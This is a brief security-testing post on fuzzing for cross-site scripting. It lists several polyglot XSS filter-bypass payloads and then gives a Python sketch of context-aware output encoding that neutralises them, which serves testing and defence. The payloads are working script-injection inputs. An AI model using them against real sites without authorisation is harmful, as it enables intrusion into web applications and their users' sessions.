Tactical Fuzzing — XSS

XSS

Core Idea: Does the page functionality display something to the users? For time-sensitive testing the 80/20 rule applies. Many testers use polyglot payloads. You probably have too!

Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)

Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)

" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//

%22})))}catch(e){alert(document.domain);}//

"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

"a")(({type:"ready"}));}catch(e){alert(1)}//
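As an added, defender-side illustration (not code from this post), the following Python sketch shows why a multi-context polyglot like payload #1 above is neutralised by context-aware output encoding: each sink (HTML body, quoted attribute, JS string literal) gets its own encoder, and a check confirms that no character able to change the parse survives. The `POLYGLOT` constant is payload #1 retyped with straight quotes; the encoder and check functions are assumptions for this example, not a library API.

```python
import html
import json

# Constructed input: polyglot payload #1 from this post, with straight quotes.
# It carries breakouts for a double-quoted attribute ("), a single-quoted
# attribute ('), an HTML tag (<button ...>) and a JS block comment (*/).
POLYGLOT = '" onclick=alert(1)//<button \' onclick=alert(1)//> */ alert(1)//'


def encode_html(value: str) -> str:
    """For HTML body text and quoted attribute values: escapes & < > " and '."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Return a double-quoted JS string literal. json.dumps escapes quotes,
    backslashes and control chars; we also neutralise '</' (so the literal can
    never terminate the enclosing <script>) and the JS line terminators."""
    literal = json.dumps(value)
    return (literal.replace("</", "<\\/")
                   .replace("\u2028", "\\u2028")
                   .replace("\u2029", "\\u2029"))


def js_literal_stays_closed(literal: str) -> bool:
    """True if the only unescaped double quotes are the outer delimiters
    and the literal cannot close a <script> element."""
    inner, escaped = literal[1:-1], False
    for ch in inner:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == '"':
            return False
    return literal[0] == literal[-1] == '"' and "</" not in inner


def render_all_contexts(value: str) -> dict:
    """The three sinks the polyglot targets, each using its own encoder."""
    return {
        "body": f"<p>{encode_html(value)}</p>",
        "attr": f'<input value="{encode_html(value)}">',
        "js": f"<script>var q = {encode_js_string(value)};</script>",
    }


def breakout_chars_survive(value: str) -> dict:
    """Per context: does any parse-changing character survive encoding?"""
    h = encode_html(value)
    return {
        "body": any(c in h for c in "<>"),
        "attr": any(c in h for c in "\"'<>"),
        "js": not js_literal_stays_closed(encode_js_string(value)),
    }
```

Running `breakout_chars_survive(POLYGLOT)` returns `False` for every context, which is the property a code review or a unit test should pin down for each sink that reflects user input.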
